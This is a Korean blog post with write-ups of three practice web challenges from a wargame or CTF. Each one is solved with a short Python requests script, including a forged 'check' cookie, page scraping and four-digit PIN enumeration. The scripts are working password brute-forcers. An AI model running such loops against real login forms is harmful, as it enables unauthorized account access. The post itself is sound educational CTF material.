Raining_93

문제를 보자.

Password를 맞추는 문제인것 같다.

index.phps가 아닌 해당 페이지의 소스코드를 보자.

소스코드를 보면 입력하는 pw의 최대 길이가 3이다.

따라서 패스워드의 총 길이는 3자리라는것이다.

이제 index.phps 소스 코드를 보자.

우리가 중요하게 봐야할것은 역시 php 코드이다.

<?php
if($_POST[pw])
{
        $password="????";

    if(!$_COOKIE[check]) exit("access denied");

    if(eregi("[^0-9]",$_POST[pw])) exit();
    if($_POST[pw]>1000) exit();

    if($_POST[pw]==???)
    {
        echo("Password is $password");
        exit();
    }

    else echo("Wrong");
}
?>

일단 if문에 들어가기 위해서는 pw가 무조건 어떤 값이 들어가야 한다는것이다.

그런 다음 if(!$_COOKIE[check]) exit("access denied");라는 코드가 있다.

이 코드는 뭘까? 생각을 해보았는데

"check"라는 쿠기값이 만약 존재하지 않는다면 exit("access denied"); 가 출력되며 프로그램이 종료된다.

일단 123를 입력해보자.

123를 입력하면 "access denied"가 뜨면서 종료된다.

즉,  if(!$_COOKIE[check]) exit("access denied"); 여기에 코드가 걸려 종료된다는 의미이다.

따라서 "check"라는 쿠키 이름을 가진 0이 아닌 값이 존재하고 값이 있어야지만  

if(!$_COOKIE[check]) exit("access denied");를 넘어가 프로그램이 종료되지 않는다.

만약 if(!$_COOKIE[check]) exit("access denied");를 통과 했다고 가정하면

다음 코드를 보자.

다음 코드는 if(eregi("[^0-9]",$_POST[pw])) exit(); 이것이다.

eregi()를 SQL Injection에서 설명을 따로 자세히했다.

eregi() 함수는 문자열을 필터링하는 함수이다.

[0-9]는 숫자를 의미하지만 앞에 ^가 있다.

^를 의미하는것은 숫자가 아닌 경우 프로그램을 종료시키겠다는것이다.

이것으로 보아 우리가 원하는 패스워드는 3자리 숫자이다.

이것을 이제 코드로 나타내보자.

import requests

for i in range(1,1000):
    print("시도: " + str(i))

    datas = {"pw": str(i)}
    cookie = {'check': '1'}

    get_pw = ("문제 URL")
    html = requests.post(get_pw, data=datas, cookies=cookie).text

    if "Wrong" in html:
        continue
    else:
        print(i)
        print(html)
        break

만약 응답 페이지에서 "Wrong"이 발견되지 않는다면 패스워드를 찾았다는 의미이므로

시도한 숫자 3자리가 패스워드를 의미한다.

프로그램에서 출력되는 패스워드를 입력하면 우리가 원하는 flag 값을 볼 수 있다.

문제를 보면 다음과 같다.

처음에 Start라는 버튼이 있다.

눌러보면 다음과 같이 페이지가 변한다.

먼저 자신의 ip가 나오며 패스워드를 입력하는 폼이 있다.

여기서 "?"라는 버튼이 있는데 눌러보면 alert되는데 alert된 값을 보면 "1234"가 있다.

1234를 입력해보자.

당연히 1234가 패스워드가 아니다.

여기서 봐야할것은 처음에는 1/100이 였다가 1234를 입력한 후에는 2/100이 됬다.

위의 결과를 보고 다음과 같은 가정을 세워보면

2는 시도한 횟수를 의미하는것이고 100은 100번안에 우리가 원하는 패스워드가 있다는 가정이다.

다시한번 "?"를 클릭하여 나오는 값을 입력해보자.

위의 alert된 값을 입력하니 역시 시도횟수가 1이 증가한 3/100이 되었다.

이렇게 수동으로 하면 언젠가는 우리가 원하는 패스워드가 나올것이다.

하지만 출제자의 의도는 수동이 아닌 코드를 작성하여 위의 행위를 코드로 하고자 문제를 출제하였으니

코드를 작성해보자.

import requests

for i in range(1,시도 횟수):
    print("시도 횟수: "+str(i))
    get_pw = ("...../index.php")
    html = requests.get(get_pw).text
    if "onclick" in html:
        cur_pw = (html[html.find("onclick=alert('")+15:html.find("')>")])
        send_pw = ("...../index.php?pw="+cur_pw)
        requests.get(send_pw)
    else:
        break

코드 설명은 따로 하지 않겠다.

이번에는 Coding 문제이다.

문제를 보자.

패스워드를 입력하는 곳이있다.

아무값이나 값을 입력해보자

당연히 password가 아니기 때문에 "Wrong password"라는 문구를 볼 수 있다.

소스 코드를보자.

뭐 특별한 것이없다.

하지만 하나 눈에 보이는것이 있다.

바로 "brute_force_me"라는 문구를 볼 수 있다.

그 뒤로 바로 size와 maxlength가 나와있다.

최대 길이는 4이며 사이즈는 4라는 의미이다.

따라서 0001에서부터 9999까지 대입을 해봐야하는것이다.

이것이 바로 brute force 공격기법이다.

brute force 공격 기법은 조합 가능한 모든 문자열을 순차적으로 하나씩 모두 대입해 보는 것이다.

그 야말로 무식하게 암호가 일치할때 까지 모든 경우의 수를 조합해 대입을 시도한다.

이론상으론 brute force 공격에 충분한 시간만 주어진다면 (모든 문자에 대한 조합을 시도해 볼 수 있기 때문에) 언젠가는 공격자가 원하는 비밀번호를 맞히게 될 것이다.

다만 현실적으로는 암호의 길이와 복잡도의 증가에 따라 공격에 걸리는 시간이 기하급수적으로 늘어나므로 이론상으로는 가능하나 현실적으로는 성공한다고 보기 어렵다.

따라서 이것을 손으로 0001~9999까지 대입하면된다.

하지만 문제 카테고리가 Coding이기 때문에 code로 brute force을 할것이다.

코드는 다음과 같다.

import requests

for i in range(1,10000):
    url=(".....?brute_force_me=" + str("{0:04d}".format(i)))
    res = requests.get(url)
    if "Wrong password" in res.text:
        pass
    else:
        print("Password: "+str("{0:04d}".format(i)))
        break

코드 설명은 따로 하지 않는다.

이렇게하면 우리가 원하는 패스워드를 얻을 수 있다.